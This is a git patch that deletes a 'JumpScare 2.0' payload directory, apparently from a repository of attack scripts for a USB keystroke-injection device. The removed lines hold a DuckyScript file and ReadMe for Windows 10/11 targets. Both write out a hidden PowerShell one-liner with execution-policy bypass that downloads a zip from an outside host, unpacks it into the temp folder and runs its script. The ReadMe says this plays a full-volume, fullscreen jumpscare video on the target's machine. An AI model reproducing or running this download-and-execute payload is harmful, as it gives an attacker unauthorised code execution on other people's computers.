From 98009f8e1647d35b9f9083f218bfd050b3c15e4d Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 25 Jul 2023 16:25:57 -0500 Subject: [PATCH] Delete Payloads/Flip-JumpScare-2.0 directory --- Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt | 14 --- Payloads/Flip-JumpScare-2.0/ReadMe.md | 123 ------------------- 2 files changed, 137 deletions(-) delete mode 100644 Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt delete mode 100644 Payloads/Flip-JumpScare-2.0/ReadMe.md diff --git a/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt b/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt deleted file mode 100644 index 290aa48..0000000 --- a/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt +++ /dev/null @@ -1,14 +0,0 @@ -REM Title: JumpScare 2.0 -REM Author: I am Jakoby -REM Description: This is a one liner payload that will execute and wait until a mouse movement is detected and do a jumpscare -REM Target: Windows 10, 11 - -REM -------------------------------------------------------------------------------------- -REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. -REM -------------------------------------------------------------------------------------- - -DELAY 2000 -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" -ENTER diff --git a/Payloads/Flip-JumpScare-2.0/ReadMe.md b/Payloads/Flip-JumpScare-2.0/ReadMe.md deleted file mode 100644 index 95f25dc..0000000 --- a/Payloads/Flip-JumpScare-2.0/ReadMe.md +++ /dev/null @@ -1,123 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - - -

- - - -

- - -
- Table of Contents -
    -
  1. Description
  2. -
  3. Getting Started
  4. -
  5. Contributing
  6. -
  7. Version History
  8. -
  9. Contact
  10. -
  11. Acknowledgments
  12. -
-
- -# JumpScare 2.0 - -A script used to jumpscare your target. - -## Description - -This script will jumpscare your target. - -A jumpscare video will be downloaded to their temp directory. - -When a mouse movement is detected, that video will be played in the PowerShell console at max volume and fullscreen. - -## Getting Started - -### Dependencies - -* An internet connection -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload -``` -powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - - - -
- - C# - -
YouTube -
- - Python - -
Twitter -
- - Golang - -
Instagram -
- - Jsonnet - -
Discord -
- - Jsonnet - -
TikTok -
-
- -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - -

(back to top)

- -

- Github Stats -